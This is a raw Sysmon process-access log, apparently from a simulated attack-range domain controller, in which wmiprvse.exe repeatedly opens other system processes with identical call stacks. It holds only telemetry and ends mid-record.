combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.171{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C